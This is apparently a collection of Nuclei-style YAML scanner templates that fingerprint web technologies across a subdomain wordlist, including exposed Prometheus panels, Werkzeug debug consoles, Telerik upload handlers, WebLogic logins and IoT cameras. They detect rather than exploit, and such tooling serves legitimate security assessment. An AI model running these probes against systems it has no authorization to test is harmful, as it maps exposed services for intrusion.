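        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    # Both matchers must succeed for a result to be reported.
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Dotclear"
      - type: status
        status:
          - 200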
--------------------------------------------------------------------------------
/Templates/Technologies/firebase-detect.yaml:
--------------------------------------------------------------------------------
# Fingerprints a Firebase database endpoint: requests the rules document with
# a placeholder auth value and looks for the token-parsing error in the body.
id: firebase-detect

info:
  name: firebase detect
  severity: low
  author: organiccrap
  # Background: http://ghostlulz.com/google-exposed-firebase-database/

requests:
  - attack: sniper
    threads: 100
    payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt

    # FIREBASE_SECRET is sent as a literal string, not a real credential;
    # the matcher relies on the server rejecting it.
    raw:
      - |
        GET /.settings/rules.json?auth=FIREBASE_SECRET HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - part: body
        type: word
        words: ['Could not parse auth token']

--------------------------------------------------------------------------------
/Templates/Technologies/google-storage.yaml:
--------------------------------------------------------------------------------
# Fingerprints a Google Cloud Storage backend by looking for the
# x-goog-metageneration response header on the site root.
id: gstorage-detect

info:
  name: Google Bucket detection
  severity: info
  author: 0xTeles

requests:
  - attack: sniper
    threads: 100
    payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt

    raw:
      - |
        GET / HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      # Two spellings are listed so either header casing is recognised.
      - part: header
        type: word
        words: ['x-goog-metageneration', 'X-Goog-Metageneration']
--------------------------------------------------------------------------------
/Templates/Technologies/harbor-detect.yaml:
--------------------------------------------------------------------------------
# Fingerprints Harbor by requiring the word "Harbor" in the body of the site
# root together with a 200 status.
id: harbor-detect
info:
  name: Harbor Detect
  severity: info
  author: pikpikcu

requests:
  - attack: sniper
    threads: 100
    payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt

    raw:
      - |
        GET / HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    # Both matchers must succeed for a result to be reported.
    matchers-condition: and
    matchers:
      - part: body
        type: word
        words: ['Harbor']

      - type: status
        status: [200]

--------------------------------------------------------------------------------
/Templates/Technologies/hikvision-detection-1.yaml:
--------------------------------------------------------------------------------
# Fingerprints a Hikvision device by requesting its login page and looking
# for the vendor name in the response.
id: hikvision-detection-1

info:
  name: Hikvision Detection
  severity: info
  author: pdteam
  tags: tech,hikvision

requests:
  - attack: sniper
    threads: 100
    payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt

    raw:
      - |
        GET /doc/page/login.asp HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
    matchers:
      - type: word
        words: ['Hikvision Digital Technology']
--------------------------------------------------------------------------------
/Templates/Technologies/hikvision-detection-2.yaml:
--------------------------------------------------------------------------------
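# Fingerprints a Hikvision device by hashing /favicon.ico and comparing the
# result with a known value.
#
# The id previously duplicated the login-page template's id
# (hikvision-detection-1), which makes results from the two checks
# indistinguishable; it now matches this file's name.
id: hikvision-detection-2

info:
  name: Hikvision Detection
  author: pdteam
  severity: info
  tags: tech,hikvision

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /favicon.ico HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
    matchers:
      # Requires a 200 status and an mmh3 hash of the base64-encoded body
      # equal to the expected favicon hash.
      - type: dsl
        name: favicon
        dsl:
          - "status_code==200 && ('999357577' == mmh3(base64_py(body)))"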
--------------------------------------------------------------------------------
/Templates/Technologies/home-assistant.yaml:
--------------------------------------------------------------------------------
# Fingerprints Home Assistant by looking for its product name in the response
# to a request for the site root.
id: home-assistant

info:
  name: Detect Home Assistant
  severity: info
  author: fabaff

requests:
  - attack: sniper
    threads: 100
    payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt

    raw:
      - |
        GET / HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        words: ['Home Assistant']
--------------------------------------------------------------------------------
/Templates/Technologies/maian-cart-detect.yaml:
--------------------------------------------------------------------------------
# Fingerprints Maian Cart by hashing /favicon.ico and comparing the result
# with a known value.
id: maian-cart-detect

info:
  name: Maian Cart Detection
  severity: info
  author: pdteam
  tags: tech,maian

requests:
  - attack: sniper
    threads: 100
    payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt

    raw:
      - |
        GET /favicon.ico HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    # Only one matcher is listed, so `and` has nothing further to combine.
    matchers-condition: and
    matchers:
      # Requires a 200 status and an mmh3 hash of the base64-encoded body
      # equal to the expected favicon hash.
      - type: dsl
        dsl:
          - 'status_code==200 && ("-498581627" == mmh3(base64_py(body)))'
--------------------------------------------------------------------------------
/Templates/Technologies/network-camera-detect.yaml:
--------------------------------------------------------------------------------
# Fingerprints a network camera web interface by requesting its CgiStart page
# and looking for the words "Network Camera" in the response.
id: network-camera-detect

info:
  name: Various Online Devices Detection (Network Camera)
  severity: info
  author: iamthefrogy
  tags: iot

requests:
  - attack: sniper
    threads: 100
    payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt

    raw:
      - |
        GET /CgiStart?page=Single HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        words: ['Network Camera']
--------------------------------------------------------------------------------
/Templates/Technologies/prometheus-exposed-panel.yaml:
--------------------------------------------------------------------------------
# Detects an exposed Prometheus web UI by requesting /graph and looking for
# the product's page title text.
id: prometheus-exposed-panel
info:
  name: Prometheus.io exposed panel
  severity: low
  author: organiccrap
  # usually runs on port http/9090

requests:
  - attack: sniper
    threads: 100
    payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt

    raw:
      - |
        GET /graph HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        words: ['Prometheus Time Series Collection and Processing Server']
--------------------------------------------------------------------------------
/Templates/Technologies/s3-detect.yaml:
--------------------------------------------------------------------------------
# Fingerprints an Amazon S3 backend: requests the path /%c0 and looks for one
# of three S3 error codes in the response body.
id: s3-detect

info:
  name: Detect Amazon-S3 Bucket
  severity: info
  author: melbadry9

requests:
  - attack: sniper
    threads: 100
    payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt

    raw:
      - |
        GET /%c0 HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - part: body
        type: regex
        regex:
          - '(?:InvalidURI|InvalidArgument|NoSuchBucket)'

--------------------------------------------------------------------------------
/Templates/Technologies/shiro-detect.yaml:
--------------------------------------------------------------------------------
# Fingerprints Apache Shiro: sends a rememberMe cookie with a dummy value and
# looks for rememberMe=deleteMe in the response headers.
id: shiro-detect
info:
  name: Detect Shiro Framework
  severity: info
  author: AresX

requests:
  - attack: sniper
    threads: 100
    payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt

    raw:
      - |
        GET / HTTP/1.1
        Host: {{Subdomains}}
        Cookie: rememberMe=123;
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    # Only one matcher is listed, so `and` has nothing further to combine.
    matchers-condition: and
    matchers:
      - part: header
        type: word
        words: ['rememberMe=deleteMe']
--------------------------------------------------------------------------------
/Templates/Technologies/sql-server-reporting.yaml:
--------------------------------------------------------------------------------
# Fingerprints Microsoft SQL Server Reporting Services by requesting the
# report folder page and looking for "Report Manager" in the response.
id: sql-server-reporting

info:
  name: Detect Microsoft SQL Server Reporting
  severity: info
  author: puzzlepeaches

requests:
  - attack: sniper
    threads: 100
    payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt

    raw:
      - |
        GET /Reports/Pages/Folder.aspx HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        words: ['Report Manager']

--------------------------------------------------------------------------------
/Templates/Technologies/telerik-fileupload-detect.yaml:
--------------------------------------------------------------------------------
# Detects a registered Telerik Web UI RadAsyncUpload handler by requesting
# the WebResource.axd endpoint with type=rau.
id: telerik-fileupload-detect

info:
  name: Detect Telerik Web UI fileupload handler
  severity: info
  author: organiccrap

requests:
  - attack: sniper
    threads: 100
    payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt

    raw:
      - |
        GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      # The spelling "succesfully" is part of the matched string and
      # presumably mirrors the handler's own response text; do not correct it.
      - type: word
        words: ['RadAsyncUpload handler is registered succesfully']

--------------------------------------------------------------------------------
/Templates/Technologies/weblogic-detect.yaml:
--------------------------------------------------------------------------------
# Fingerprints Oracle WebLogic by requesting the admin console login form and
# looking for "WebLogic" in the response.
id: weblogic-detect

info:
  name: Detect Weblogic
  severity: info
  author: bing0o

requests:
  - attack: sniper
    threads: 100
    payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt

    raw:
      - |
        GET /console/login/LoginForm.jsp HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        words: ['WebLogic']
--------------------------------------------------------------------------------
/Templates/Technologies/werkzeug-debugger-detect.yaml:
--------------------------------------------------------------------------------
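# Detects an exposed Werkzeug debugger console by requesting /console and
# looking for the console heading text in the body.
id: werkzeug-debugger-detect

info:
  name: Werkzeug debugger console
  author: pdteam
  severity: info

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /console HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        words:
          # Kept on a single line: the quoted word was split across two
          # lines, and a line break inside the quotes becomes part of the
          # string being matched.
          - "Interactive Console"
        part: body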
--------------------------------------------------------------------------------